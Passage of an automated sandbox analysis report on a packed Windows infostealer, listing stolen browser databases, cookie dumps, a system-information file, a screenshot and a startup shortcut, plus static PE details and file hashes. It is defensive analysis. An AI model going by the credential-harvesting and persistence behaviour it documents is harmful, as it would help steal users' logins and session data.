                                                                        Entropy (8bit):1.121297215059106
                                                                        Encrypted:false
                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\spanwEuxN9jQl5RT\XT01mi44PjK3Web Data

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.136413900497188
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\spanwEuxN9jQl5RT\XoAYuCVFE8UKWeb Data

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                        Category:dropped
                                                                        Size (bytes):196608
                                                                        Entropy (8bit):1.121297215059106
                                                                        Encrypted:false
                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\spanwEuxN9jQl5RT\hABmARFSHTPPLogin Data

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\spanwEuxN9jQl5RT\hEjER2JL694ZCookies

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.8439810553697228
                                                                        Encrypted:false
                                                                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                        MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                        SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                        SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                        SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\spanwEuxN9jQl5RT\i6lfSskNm5LrWeb Data

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                        Category:dropped
                                                                        Size (bytes):196608
                                                                        Entropy (8bit):1.121297215059106
                                                                        Encrypted:false
                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\spanwEuxN9jQl5RT\niRQM4iEj4A_Web Data

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.136413900497188
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\spanwEuxN9jQl5RT\umz__9J7rRLfLogin Data

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):51200
                                                                        Entropy (8bit):0.8746135976761988
                                                                        Encrypted:false
                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\spanwEuxN9jQl5RT\zIzhhVa_EL18Login Data For Account

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\trixywEuxN9jQl5RT\Cookies\Chrome_Default.txt

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:ASCII text, with very long lines (369), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):530
                                                                        Entropy (8bit):5.999391385907715
                                                                        Encrypted:false
                                                                        SSDEEP:12:copYxSlufq7gCx7Fbyr4rOSlTfJJADr6HDsZQZ7gC6:KauS79Gr4iSllJALQZ7c
                                                                        MD5:06ED2CD304730F55A5C7001509E128BE
                                                                        SHA1:49651485B2CE3D239172BD52BF5A265AB3EB8E18
                                                                        SHA-256:66851B5AA77B3DEE71B842F53D4E30F664F5A08F9754B9E87B323871981516A4
                                                                        SHA-512:0163A8537DE695D34865EEB9C872F15A1827644D8797344A2D36E776F174E5901E77AA560488B0D7D7359B3648614F818B85A7D51F59CCDF2831B5715F5A9334
                                                                        Malicious:false
                                                                        Preview:.google.com.FALSE./.TRUE.1699018815.1P_JAR.ENC893*_djEwmUj/dRHWNmfhbTB/w+u3HcpAF49UGcxvovgmz9ye9OQyJO9KCFHkRm8=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*...google.com.TRUE./.TRUE.1712238015.NID.ENC893*_djEwFCqquAx+Q1mLxpuZeEBJZSgzAt4Ngo/HHXcYPxMGINXG0MJzCe/y7m5VzpUyfsA6ingOdNobTvWP/YbKYpzg64nmGlCjRU9RpPIjDAuAxGlp5MTMUaOP4iC8aSCuijjqDE5gAdZQ5Jgb0/uEAZ4ssWGDsxXJbqpGbi04viYfPDhBfQ9XKXznqtHW/weYlNZJIGlKZBsCWoEIKfuL56VHKaBt04gLO/XK1/P3nHsp6pSc1x1uk1RRK7hSYUjCY5G/hcpBBjFv74dICDI=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*..

                                                                        C:\Users\user\AppData\Local\Temp\trixywEuxN9jQl5RT\History\Firefox_v6zchhhv.default-release.txt

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):112
                                                                        Entropy (8bit):4.9113057226932435
                                                                        Encrypted:false
                                                                        SSDEEP:3:N8DSLvIJiMgTE2WdkQVjDSLvIJiMhKVX3L2WdkQVQ:2OLciodFOLciA8dq
                                                                        MD5:0CE7E561D96623E70DD177304D3B56DA
                                                                        SHA1:27B4131817E71657AED90C086E01E7E925BF641E
                                                                        SHA-256:E0B2F92CFB58B7D5EDFBB1FDF3E81194D4E55A90706986C389BDF21D2AD2325D
                                                                        SHA-512:48154E76523305BBB7ED39FEAD22CB4DD6FDD568259DC8D0E70ABA4A21030DAF6D1274E0DC5D7F10DFCF7B3B61BD2401FFB4768F301AEF04F142AF23EF335AB5
                                                                        Malicious:false
                                                                        Preview:https://www.mozilla.org/privacy/firefox/.1696426831..https://www.mozilla.org/en-US/privacy/firefox/.1696426831..

                                                                        C:\Users\user\AppData\Local\Temp\trixywEuxN9jQl5RT\information.txt

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):6387
                                                                        Entropy (8bit):5.472920704866244
                                                                        Encrypted:false
                                                                        SSDEEP:96:xzxJRCRhuc2KBhA6tsxODsh2VktQLANUbg3x:x8PuX6tsxPh2SB
                                                                        MD5:A61B00278DDFAB358CD0998F6A9F0EE9
                                                                        SHA1:8FEDE9166A11B006E1C8C4CAC8970ED72BFE10C0
                                                                        SHA-256:F8AA247019E483BB7F645BCD209F4E114C7B35A570F4BDCF8D84E9348508849D
                                                                        SHA-512:1679D9048458A4BD8A9170E612220E257A406CC46F881E3906B822688081C17E153571379C4DFDB9FA509D610BFC40F36B58FE03D5A98FCAB8637142683DAEF4
                                                                        Malicious:false
                                                                        Preview:Build: default..Version: 2.0....Date: Sun May 12 12:31:03 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: 821ed8f33db41d932a559920361b1350....Path: C:\Users\user\Desktop\file.exe..Work Dir: C:\Users\user\AppData\Local\Temp\trixywEuxN9jQl5RT....IP: 81.181.60.11..Location: US, Seattle..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 724536 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 12/5/2024 12:31:3..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [332]..csrss.exe [420]..wininit.exe [496]..csrss.exe [504]..winlogon.exe [564]..services.exe [632]..lsass.exe [640]..svchost.exe [752]..fontdrvhost.exe [780]..fontdrvhost.exe [788].

                                                                        C:\Users\user\AppData\Local\Temp\trixywEuxN9jQl5RT\passwords.txt

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4897
                                                                        Entropy (8bit):2.518316437186352
                                                                        Encrypted:false
                                                                        SSDEEP:48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
                                                                        MD5:B3E9D0E1B8207AA74CB8812BAAF52EAE
                                                                        SHA1:A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
                                                                        SHA-256:4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
                                                                        SHA-512:B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
                                                                        Malicious:false
                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\trixywEuxN9jQl5RT\screenshot.png

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):709223
                                                                        Entropy (8bit):7.9293497756756075
                                                                        Encrypted:false
                                                                        SSDEEP:12288:0QmVT444oC/rSfJG2FflFivwmzJywBzQeTf8L3zmFLlXA7iXyDY:jmVT34oC/CJGcivfvhf8jERQeyDY
                                                                        MD5:8245875C5A6994F35A9DF72E996FDF10
                                                                        SHA1:D633A9E339C4A52BC88274EC2337BC1933DD27B4
                                                                        SHA-256:DAB0E535FC7279C990CE36720D57CED7173F92952D50ED6F60FB11EF875FAE39
                                                                        SHA-512:03D9E9DFC8426CBF75CEF55A81F95DDD4256DD4A70FBF76BC818257BEBFA0FBB65033F6026E0668ED0F31FC6D979CE942B12230B7864C86B8A414254A6684221
                                                                        Malicious:false
                                                                        Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e....Y.....f...../....................#.. ...)$$..F.H.Z.@ ... Jx...@..z.9..uw..2oV......{..9.f!U>..9.....j.^..f.h.m..^.K...u...,S....i.l?w8..N._.....F.L...;q.../..7^..Wl.h.ai.}z...aZ.}-....W..=.Ri-{v .....}......N..g.2vdE..g.......O...aS......I..'.....Y.z|.....P......i}../<..>..$..>...............C.c.}px....h..g.1.......=./...}.....x..',o..?~_...z3..v_..soO..........c....bs..7S.h.X9...w5}....;.v.s....0........Sk..i.G.Ls..1..]o.}xyn...r...?.`.............i.....f...w.........j.k....%...N.6....#.......4...2..<..?7w.[rl.N.......-..;.u..9.-.)...1...!.......4........r.[;.....#......s..m..6......z.%.a.7....5...........-...4.{...>.v..~..w..R{.ks;......f..&...i.c...]....W..^....]..ki.1?.>.<..s..6..+6gK..s.s..f..s.la..m.P.l.2.]mcrl...ovM..#6...]....FW.....~.b..W6.~.>....u}.^.........6...j<g#....4..k}b......lf..|>......W.....ru=....=..X.k....<r

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Sun May 12 09:31:52 2024, mtime=Sun May 12 09:31:52 2024, atime=Sun May 12 09:31:52 2024, length=125695, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):1330
                                                                        Entropy (8bit):4.890114825762116
                                                                        Encrypted:false
                                                                        SSDEEP:24:8qQQHfw8Hh6ORDgKALhXAVxzedPzqygm:8qQQHttRkhwVxzeoyg
                                                                        MD5:3B69C4165D947DB01F4575A41A247676
                                                                        SHA1:B2496F776F7832BBE6DE92E52A73F48BE07F6D0F
                                                                        SHA-256:F1A71021122976DA7BDBC23D505964A94E6464E814D405B976D7F7B3870FC16D
                                                                        SHA-512:BB9862710498A6A1CFB03480A6379E75595734ACBC6E038807C12B1EC8C9A8A8080D332600E14A39F2EB218F142FF91E13623065600D351D582670E06E2BCA5E
                                                                        Malicious:false
                                                                        Preview:L..................F.... ....%..W....%..W...6c..W...........................X.:..DG..Yr?.D..U..k0.&...&...... M.....&PprW.....W.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X.S....B.....................Bdg.A.p.p.D.a.t.a...B.P.1......X.S..Local.<......DWSl.X.S....V.....................P\..L.o.c.a.l.....N.1......X.S..Temp..:......DWSl.X.S....\......................O..T.e.m.p.......1......X.S..EDGEMS~1.........X.S.X.S.........."...............&...E.d.g.e.M.S.2._.c.8.1.e.7.2.8.d.9.d.4.c.2.f.6.3.6.f.0.6.7.f.8.9.c.c.1.4.8.6.2.c.....b.2......X.S .EdgeMS2.exe.H......X.S.X.S.............................E.d.g.e.M.S.2...e.x.e.......................-....................d.....C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe....E.d.g.e.M.S.2.Q.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.M.S.2._.c.8.1.e.7.2.8.d.9.d.4.c.2.f.6.3.6.f.0.6.7.f.8.9.c.c.1.4.8.6.2.c.\.E.d.g.e.M.S.2...e.x.e.........

                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                        Category:dropped
                                                                        Size (bytes):1835008
                                                                        Entropy (8bit):4.4189728188291895
                                                                        Encrypted:false
                                                                        SSDEEP:6144:8Svfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNd0uhiTw:nvloTMW+EZMM6DFyn03w
                                                                        MD5:E6980A2EB81490286474E168190798E2
                                                                        SHA1:F7D9CD70F1F50C2E9A88A2FCECEC782251B8EDFC
                                                                        SHA-256:08B700CC9C05E13C8018976D082E6AF7445C0C70A243141BAF7EC79FF0A3DA7B
                                                                        SHA-512:0F57AD53BF722A4FCB81B61EC862A4C0D803BDBB212A64948C1896A3FE7EA0ED2BD2EF96E761A02A5553BD186F1784C31CE45EF6E14748A03A71BC8DF4907693
                                                                        Malicious:false
                                                                        Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..W...............................................................................................................................................................................................................................................................................................................................................3..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.882034995724492
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:file.exe
                                                                        File size:3'434'744 bytes
                                                                        MD5:a594a9e1f8db460345e86810d1c9a639
                                                                        SHA1:ca9a256f48c6059909926c6fa547c56f9a2df9c0
                                                                        SHA256:d8e3a7e5df4c2591b40d2af7a224c6e5cb18e11d27cbfdbfdda4e02db33c849e
                                                                        SHA512:b03606f6e0ce2a6665a889e06816673754c0a4a2580d6acdec5a892ed5dcc7a03c5174643581e4c9e756b187dc3cd0fde1e437eaa456aa1aa8e9b531ab1ce8d7
                                                                        SSDEEP:98304:cvuyJF4/U6Wcq29czi/dwKXvCu28ENYvViLFn:DcLMqOJvyYvVE1
                                                                        TLSH:26F523937AC112E4F599A0355683FCBD3AB53FF514508D1A708C7AAFE8F3264A13B642
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...jR;f...............'.....0........E...........@..........................0b.....;.4...@................................

                                                                        File Icon

                                                                        Icon Hash:6fdb9b9b1b1c8838

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x85eba1
                                                                        Entrypoint Section:.vmp\]
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x663B526A [Wed May 8 10:22:34 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:6
                                                                        OS Version Minor:0
                                                                        File Version Major:6
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:6
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:7ad43923e3c89560dc5c9969c825cbc8

                                                                        Authenticode Signature

                                                                        Signature Valid:false
                                                                        Signature Issuer:CN=AVG Technologies USA LLC \u2122\u2030\u2122\u2030\u2122\u2030
                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                        Error Number:-2146762487
                                                                        Not Before, Not After
                                                                        • 06/01/2024 11:14:42 07/01/2034 11:14:42
                                                                        Subject Chain
                                                                        • CN=AVG Technologies USA LLC \u2122\u2030\u2122\u2030\u2122\u2030
                                                                        Version:3
                                                                        Thumbprint MD5:27F5DD79C86B9255242DDB29A51B691E
                                                                        Thumbprint SHA-1:44268FBAA5D87BA1717C7237701B06FA20E9AF66
                                                                        Thumbprint SHA-256:1C39A7BBBC7445339DEFD55E21DFA65CDEB9037F0FD33140759077C31CB40BE0
                                                                        Serial:59AE1233E1806897438DF0EEC7051E17

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        call 00007F81B4F59685h
                                                                        mov ebp, EB3FB93Eh
                                                                        push ebp
                                                                        sar bp, FF87h
                                                                        mov ebp, esi
                                                                        sar word ptr [esp+00h], 0068h
                                                                        ja 00007F81B4F8DB0Ah
                                                                        and al, dl
                                                                        jmp 00007F81B4F08E3Fh

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3e6f140x12c.vmp\]
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x5b60000x6cae6.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x3450000x18f8.vmp\]
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x5b40000x1a44.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x43e4d40x18.vmp\]
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5b37f00x40.vmp\]
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2b60000x84.vmp\]
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x415b7c0x40.vmp\]
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x15bae80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x15d0000x27e320x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x1850000x49300x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .vmp\]0x18a0000x12b0950x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .vmp\]0x2b60000x5880x600e77729a5ce6ad7ee7568939c4c4c541cFalse0.06966145833333333data0.43101004462120796IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .vmp\]0x2b70000x2fcfc00x2fd000474d5673c52eefd970d1197c64cd03c8unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .reloc0x5b40000x1a440x1c00f87576d0c3b87673ec2bfc996d4dca47False0.3597935267857143data5.733645560847565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x5b60000x6cae60x45a009e54af52a1f6856bc3054854d7a51e65False0.5843735973967684data6.336442400565138IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_BITMAP0x5fb9c00x22dfadata0.1875
                                                                        RT_ICON0x5b6a300x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.7562056737588653
